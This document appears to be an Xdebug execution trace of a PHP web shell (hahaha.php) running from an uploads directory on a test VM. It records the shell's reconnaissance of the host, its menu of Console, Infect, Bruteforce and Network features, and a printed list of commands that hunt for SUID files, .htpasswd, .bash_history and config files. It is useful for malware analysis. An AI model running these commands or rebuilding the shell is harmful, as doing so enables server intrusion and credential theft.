2		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	47	_COOKIE['421aa90e079fa326b6494f812ad13e79ajax'] = TRUE
3	24	0	0.013555	1515472	substr	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	58	3	'Linux'	0	3
3	24	1	0.013570	1515600
3	24	R			'Lin'
3	25	0	0.013582	1515504	strtolower	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	58	1	'Lin'
3	25	1	0.013596	1515568
3	25	R			'lin'
2		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	61	$os = 'nix'
3	26	0	0.013621	1515472	ini_get	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	62	1	'safe_mode'
3	26	1	0.013635	1515504
3	26	R			FALSE
2		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	62	$safe_mode = FALSE
3	27	0	0.013659	1515472	error_reporting	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	64	1	0
3	27	1	0.013673	1515512
3	27	R			22527
3	28	0	0.013685	1515472	ini_get	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	65	1	'disable_functions'
3	28	1	0.013700	1515952
3	28	R			'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
2		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	65	$disable_functions = 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
3	29	0	0.013747	1515920	getcwd	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	66	0
3	29	1	0.013761	1515968
3	29	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	66	$home_cwd = '/var/www/html/uploads'
3	30	0	0.013788	1515968	getcwd	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	69	0
3	30	1	0.013802	1516016
3	30	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	69	$cwd = '/var/www/html/uploads'
2		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	75	$cwd .= '/'
3	31	0	0.013839	1516016	function_exists	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	264	1	'posix_getpwuid'
3	31	1	0.013854	1516056
3	31	R			TRUE
3	32	0	0.013866	1516016	function_exists	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	265	1	'posix_getgrgid'
3	32	1	0.013880	1516056
3	32	R			TRUE
2		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	607	$aliases = ['List dir' => 'ls -lha', 'list file attributes on a Linux second extended file system' => 'lsattr -va', 'show opened ports' => 'netstat -an | grep -i listen', 'process status' => 'ps aux', 'Find' => '', 'find all suid files' => 'find / -type f -perm -04000 -ls', 'find suid files in current dir' => 'find . -type f -perm -04000 -ls', 'find all sgid files' => 'find / -type f -perm -02000 -ls', 'find sgid files in current dir' => 'find . -type f -perm -02000 -ls', 'find config.inc.php files' => 'find / -type f -name config.inc.php', 'find config* files' => 'find / -type f -name "config*"', 'find config* files in current dir' => 'find . -type f -name "config*"', 'find all writable folders and files' => 'find / -perm -2 -ls', 'find all writable folders and files in current dir' => 'find . -perm -2 -ls', 'find all service.pwd files' => 'find / -type f -name service.pwd', 'find service.pwd files in current dir' => 'find . -type f -name service.pwd', 'find all .htpasswd files' => 'find / -type f -name .htpasswd', 'find .htpasswd files in current dir' => 'find . -type f -name .htpasswd', 'find all .bash_history files' => 'find / -type f -name .bash_history', 'find .bash_history files in current dir' => 'find . -type f -name .bash_history', 'find all .fetchmailrc files' => 'find / -type f -name .fetchmailrc', 'find .fetchmailrc files in current dir' => 'find . -type f -name .fetchmailrc', 'Locate' => '', 'locate httpd.conf files' => 'locate httpd.conf', 'locate vhosts.conf files' => 'locate vhosts.conf', 'locate proftpd.conf files' => 'locate proftpd.conf', 'locate psybnc.conf files' => 'locate psybnc.conf', 'locate my.conf files' => 'locate my.conf', 'locate admin.php files' => 'locate admin.php', 'locate cfg.php files' => 'locate cfg.php', 'locate conf.php files' => 'locate conf.php', 'locate config.dat files' => 'locate config.dat', 'locate config.php files' => 'locate config.php', 'locate config.inc files' => 'locate config.inc', 'locate config.inc.php' => 'locate config.inc.php', 'locate config.default.php files' => 'locate config.default.php', 'locate config* files ' => 'locate config', 'locate .conf files' => 'locate \'.conf\'', 'locate .pwd files' => 'locate \'.pwd\'', 'locate .sql files' => 'locate \'.sql\'', 'locate .htpasswd files' => 'locate \'.htpasswd\'', 'locate .bash_history files' => 'locate \'.bash_history\'', 'locate .mysql_history files' => 'locate \'.mysql_history\'', 'locate .fetchmailrc files' => 'locate \'.fetchmailrc\'', 'locate backup files' => 'locate backup', 'locate dump files' => 'locate dump', 'locate priv files' => 'locate priv']
3	33	0	0.013964	1516056	function_exists	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	1626	1	'actionFilesMan'
3	33	1	0.013980	1516096
3	33	R			TRUE
2		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	1627	_POST['a'] = 'FilesMan'
3	34	0	0.014007	1516056	function_exists	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	1630	1	'actionFilesMan'
3	34	1	0.014022	1516096
3	34	R			TRUE
3	35	0	0.014036	1516016	actionFilesMan	1		/var/www/html/uploads/hahaha.php(1) : eval()'d code	1631	0
4	36	0	0.014050	1516016	hardHeader	1		/var/www/html/uploads/hahaha.php(1) : eval()'d code	883	0
5	37	0	0.014065	1518552	htmlspecialchars	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	119	1	'/var/www/html/uploads/'
5	37	1	0.014082	1518744
5	37	R			'/var/www/html/uploads/'
5	38	0	0.014097	1518552	htmlspecialchars	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	120	1	'FilesMan'
5	38	1	0.014111	1518744
5	38	R			'FilesMan'
5	39	0	0.014125	1519064	htmlspecialchars	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	121	1	'UTF-8'
5	39	1	0.014144	1519256
5	39	R			'UTF-8'
5	40	0	0.014159	1519064	strpos	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	122	2	NULL	'\n'
5	40	1	0.014174	1519136
5	40	R			FALSE
5	41	0	0.014188	1519064	htmlspecialchars	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	122	2	NULL	3
5	41	1	0.014202	1519296
5	41	R			''
5	42	0	0.014216	1519064	strpos	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	123	2	NULL	'\n'
5	42	1	0.014230	1519136
5	42	R			FALSE
5	43	0	0.014244	1519064	htmlspecialchars	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	123	2	NULL	3
5	43	1	0.014258	1519296
5	43	R			''
5	44	0	0.014272	1519064	strpos	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	124	2	NULL	'\n'
5	44	1	0.014286	1519136
5	44	R			FALSE
5	45	0	0.014299	1519064	htmlspecialchars	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	124	2	NULL	3
5	45	1	0.014313	1519296
5	45	R			''
5	46	0	0.014326	1524184	md5	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	136	1	'localhost'
5	46	1	0.014340	1524280
5	46	R			'421aa90e079fa326b6494f812ad13e79'
5	47	0	0.014355	1524184	md5	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	137	1	'localhost'
5	47	1	0.014368	1524280
5	47	R			'421aa90e079fa326b6494f812ad13e79'
5	48	0	0.014383	1524184	md5	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	138	1	'localhost'
5	48	1	0.014396	1524280
5	48	R			'421aa90e079fa326b6494f812ad13e79'
5	49	0	0.014410	1524184	md5	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	139	1	'localhost'
5	49	1	0.014423	1524280
5	49	R			'421aa90e079fa326b6494f812ad13e79'
5	50	0	0.014438	1524184	md5	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	140	1	'localhost'
5	50	1	0.014451	1524280
5	50	R			'421aa90e079fa326b6494f812ad13e79'
5	51	0	0.014465	1524184	addslashes	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	152	1	'/uploads/hahaha.php'
5	51	1	0.014478	1524216
5	51	R			'/uploads/hahaha.php'
5	52	0	0.014499	1516104	diskfreespace	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	184	1	'/var/www/html/uploads/'
5	52	1	0.014518	1516136
5	52	R			203522609152
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	184	$freeSpace = 203522609152
5	53	0	0.014545	1516104	disk_total_space	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	185	1	'/var/www/html/uploads/'
5	53	1	0.014560	1516136
5	53	R			232015802368
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	185	$totalSpace = 232015802368
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	186	$totalSpace = 232015802368
5	54	0	0.014597	1516104	php_uname	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	187	1	'r'
5	54	1	0.014612	1516184
5	54	R			'5.15.0-60-generic'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	187	$release = '5.15.0-60-generic'
5	55	0	0.014638	1516152	php_uname	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	188	1	's'
5	55	1	0.014652	1516216
5	55	R			'Linux'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	188	$kernel = 'Linux'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	189	$explink = 'https://noreferer.de/?https://www.exploit-db.com/search/?action=search&description='
5	56	0	0.014691	1516184	strpos	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	190	2	'Linux'	'Linux'
5	56	1	0.014705	1516256
5	56	R			0
5	57	0	0.014718	1516184	substr	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	191	3	'5.15.0-60-generic'	0	6
5	57	1	0.014733	1516312
5	57	R			'5.15.0'
5	58	0	0.014746	1516232	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	191	1	'Linux Kernel 5.15.0'
5	58	1	0.014760	1516312
5	58	R			'Linux+Kernel+5.15.0'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	191	$explink .= 'Linux+Kernel+5.15.0'
5	59	0	0.014787	1516312	function_exists	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	194	1	'posix_getegid'
5	59	1	0.014801	1516352
5	59	R			TRUE
5	60	0	0.014814	1516312	posix_geteuid	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	200	0
5	60	1	0.014832	1516312
5	60	R			33
5	61	0	0.014845	1516312	posix_getpwuid	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	200	1	33
5	61	1	0.014877	1517144
5	61	R			['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	200	$uid = ['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
5	62	0	0.014920	1517112	posix_getegid	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	201	0
5	62	1	0.014934	1517112
5	62	R			33
5	63	0	0.014946	1517112	posix_getgrgid	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	201	1	33
5	63	1	0.014974	1517776
5	63	R			['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	201	$gid = ['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	202	$user = 'www-data'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	203	$uid = 33
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	204	$group = 'www-data'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	205	$gid = 33
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	207	$cwd_links = ''
5	64	0	0.015065	1516392	explode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	208	2	'/'	'/var/www/html/uploads/'
5	64	1	0.015081	1517000
5	64	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	208	$path = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	209	$n = 6
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	210	$i = 0
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	211	$cwd_links .= '<a href=\'#\' onclick=\'g("FilesMan","'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	212	$j = 0
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	213	$cwd_links .= '/'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	212	$j++
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	214	$cwd_links .= '")\'>/</a>'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	210	$i++
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	211	$cwd_links .= '<a href=\'#\' onclick=\'g("FilesMan","'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	212	$j = 0
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	213	$cwd_links .= '/'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	212	$j++
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	213	$cwd_links .= 'var/'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	212	$j++
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	214	$cwd_links .= '")\'>var/</a>'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	210	$i++
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	211	$cwd_links .= '<a href=\'#\' onclick=\'g("FilesMan","'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	212	$j = 0
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	213	$cwd_links .= '/'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	212	$j++
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	213	$cwd_links .= 'var/'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	212	$j++
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	213	$cwd_links .= 'www/'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	212	$j++
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	214	$cwd_links .= '")\'>www/</a>'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	210	$i++
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	211	$cwd_links .= '<a href=\'#\' onclick=\'g("FilesMan","'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	212	$j = 0
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	213	$cwd_links .= '/'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	212	$j++
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	213	$cwd_links .= 'var/'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	212	$j++
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	213	$cwd_links .= 'www/'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	212	$j++
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	213	$cwd_links .= 'html/'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	212	$j++
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	214	$cwd_links .= '")\'>html/</a>'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	210	$i++
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	211	$cwd_links .= '<a href=\'#\' onclick=\'g("FilesMan","'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	212	$j = 0
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	213	$cwd_links .= '/'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	212	$j++
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	213	$cwd_links .= 'var/'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	212	$j++
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	213	$cwd_links .= 'www/'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	212	$j++
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	213	$cwd_links .= 'html/'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	212	$j++
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	213	$cwd_links .= 'uploads/'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	212	$j++
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	214	$cwd_links .= '")\'>uploads/</a>'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	210	$i++
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	216	$charsets = [0 => 'UTF-8', 1 => 'Windows-1251', 2 => 'KOI8-R', 3 => 'KOI8-U', 4 => 'cp866']
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	217	$opt_charsets = ''
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	219	$opt_charsets .= '<option value="UTF-8" selected>UTF-8</option>'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	219	$opt_charsets .= '<option value="Windows-1251" >Windows-1251</option>'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	219	$opt_charsets .= '<option value="KOI8-R" >KOI8-R</option>'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	219	$opt_charsets .= '<option value="KOI8-U" >KOI8-U</option>'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	219	$opt_charsets .= '<option value="cp866" >cp866</option>'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	220	$m = ['Sec. Info' => 'SecInfo', 'Files' => 'FilesMan', 'Console' => 'Console', 'Infect' => 'Infect', 'Sql' => 'Sql', 'Php' => 'Php', 'Safe mode' => 'SafeMode', 'String tools' => 'StringTools', 'Bruteforce' => 'Bruteforce', 'Network' => 'Network']
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	223	$m['Self remove'] = 'SelfRemove'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	224	$menu = ''
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	225	$k = 'Sec. Info'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	226	$menu .= '<th>[ <a href="#" onclick="g(\'SecInfo\',null,\'\',\'\',\'\')">Sec. Info</a> ]</th>'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	225	$k = 'Files'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	226	$menu .= '<th>[ <a href="#" onclick="g(\'FilesMan\',null,\'\',\'\',\'\')">Files</a> ]</th>'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	225	$k = 'Console'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	226	$menu .= '<th>[ <a href="#" onclick="g(\'Console\',null,\'\',\'\',\'\')">Console</a> ]</th>'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	225	$k = 'Infect'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	226	$menu .= '<th>[ <a href="#" onclick="g(\'Infect\',null,\'\',\'\',\'\')">Infect</a> ]</th>'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	225	$k = 'Sql'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	226	$menu .= '<th>[ <a href="#" onclick="g(\'Sql\',null,\'\',\'\',\'\')">Sql</a> ]</th>'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	225	$k = 'Php'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	226	$menu .= '<th>[ <a href="#" onclick="g(\'Php\',null,\'\',\'\',\'\')">Php</a> ]</th>'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	225	$k = 'Safe mode'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	226	$menu .= '<th>[ <a href="#" onclick="g(\'SafeMode\',null,\'\',\'\',\'\')">Safe mode</a> ]</th>'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	225	$k = 'String tools'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	226	$menu .= '<th>[ <a href="#" onclick="g(\'StringTools\',null,\'\',\'\',\'\')">String tools</a> ]</th>'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	225	$k = 'Bruteforce'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	226	$menu .= '<th>[ <a href="#" onclick="g(\'Bruteforce\',null,\'\',\'\',\'\')">Bruteforce</a> ]</th>'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	225	$k = 'Network'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	226	$menu .= '<th>[ <a href="#" onclick="g(\'Network\',null,\'\',\'\',\'\')">Network</a> ]</th>'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	225	$k = 'Self remove'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	226	$menu .= '<th>[ <a href="#" onclick="g(\'SelfRemove\',null,\'\',\'\',\'\')">Self remove</a> ]</th>'
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	227	$drives = ''
5	65	0	0.016065	1519288	php_uname	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	235	0
5	65	1	0.016078	1519400
5	65	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
5	66	0	0.016097	1519400	substr	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	235	3	'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'	0	120
5	66	1	0.016116	1519496
5	66	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
5	67	0	0.016134	1519416	php_uname	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	235	0
5	67	1	0.016148	1519528
5	67	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
5	68	0	0.016166	1519528	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	235	1	'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
5	68	1	0.016184	1519688
5	68	R			'Linux+osboxes+5.15.0-60-generic+%2366-Ubuntu+SMP+Fri+Jan+20+14%3A29%3A49+UTC+2023+x86_64'
5	69	0	0.016203	1519864	phpversion	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	235	0
5	69	1	0.016216	1519928
5	69	R			'7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
5	70	0	0.016233	1519992	date	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	235	1	'Y-m-d H:i:s'
5	70	1	0.016290	1522344
5	70	R			'2023-02-12 19:03:55'
5	71	0	0.016309	1522056	viewSize	1		/var/www/html/uploads/hahaha.php(1) : eval()'d code	235	1	232015802368
6	72	0	0.016324	1522056	sprintf	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	291	2	'%1.2f'	216.08155441284
6	72	1	0.016341	1522440
6	72	R			'216.08'
5	71	1	0.016355	1522096
5	71	R			'216.08 GB'
5	73	0	0.016369	1522056	viewSize	1		/var/www/html/uploads/hahaha.php(1) : eval()'d code	235	1	203522609152
6	74	0	0.016383	1522056	sprintf	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	291	2	'%1.2f'	189.5452003479
6	74	1	0.016398	1522440
6	74	R			'189.55'
5	73	1	0.016412	1522096
5	73	R			'189.55 GB'
5	75	0	0.016426	1522056	round	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	235	2	87.719287684204	2
5	75	1	0.016441	1522128
5	75	R			87.72
5	76	0	0.016456	1522440	viewPermsColor	1		/var/www/html/uploads/hahaha.php(1) : eval()'d code	235	1	'/var/www/html/uploads/'
6	77	0	0.016470	1522440	is_readable	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	320	1	'/var/www/html/uploads/'
6	77	1	0.016490	1522480
6	77	R			TRUE
6	78	0	0.016503	1522440	is_writable	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	322	1	'/var/www/html/uploads/'
6	78	1	0.016519	1522480
6	78	R			TRUE
6	79	0	0.016537	1522440	fileperms	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	325	1	'/var/www/html/uploads/'
6	79	1	0.016554	1522504
6	79	R			16895
6	80	0	0.016567	1522464	perms	1		/var/www/html/uploads/hahaha.php(1) : eval()'d code	325	1	16895
6		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	304	$i = 'd'
6		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	308	$i .= 'r'
6		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	309	$i .= 'w'
6		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	310	$i .= 'x'
6		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	311	$i .= 'r'
6		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	312	$i .= 'w'
6		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	313	$i .= 'x'
6		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	314	$i .= 'r'
6		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	315	$i .= 'w'
6		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	316	$i .= 'x'
6	80	1	0.016694	1522504
6	80	R			'drwxrwxrwx'
5	76	1	0.016708	1522544
5	76	R			'<font color=#FFDB5F><b>drwxrwxrwx</b></font>'
5	81	0	0.016726	1522976	gethostbyname	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	236	1	'localhost'
5	81	1	0.016762	1523056
5	81	R			'127.0.0.1'
4	36	1	0.016780	1518192
4	82	0	0.016789	1518192	hardScandir	1		/var/www/html/uploads/hahaha.php(1) : eval()'d code	885	1	'/var/www/html/uploads/'
5	83	0	0.016804	1518192	function_exists	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	328	1	'scandir'
5	83	1	0.016818	1518232
5	83	R			TRUE
5	84	0	0.016831	1518192	scandir	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	329	1	'/var/www/html/uploads/'
5	84	1	0.016861	1518816
5	84	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'hahaha.php', 5 => 'prepend.php']
4	82	1	0.016885	1518784
4	82	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'hahaha.php', 5 => 'prepend.php']
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	885	$dirContent = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'hahaha.php', 5 => 'prepend.php']
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	888	$sort = [0 => 'name', 1 => 1]
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	902	$files = []
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	902	$dirs = []
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	903	$n = 6
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	904	$i = 0
4	85	0	0.016994	1518808	fileowner	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	905	1	'.'
4	85	1	0.017011	1518832
4	85	R			0
4	86	0	0.017024	1518792	posix_getpwuid	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	905	1	0
4	86	1	0.017050	1519592
4	86	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	905	$ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	87	0	0.017092	1519560	filegroup	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	906	1	'.'
4	87	1	0.017106	1519600
4	87	R			0
4	88	0	0.017119	1519560	posix_getgrgid	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	906	1	0
4	88	1	0.017141	1520216
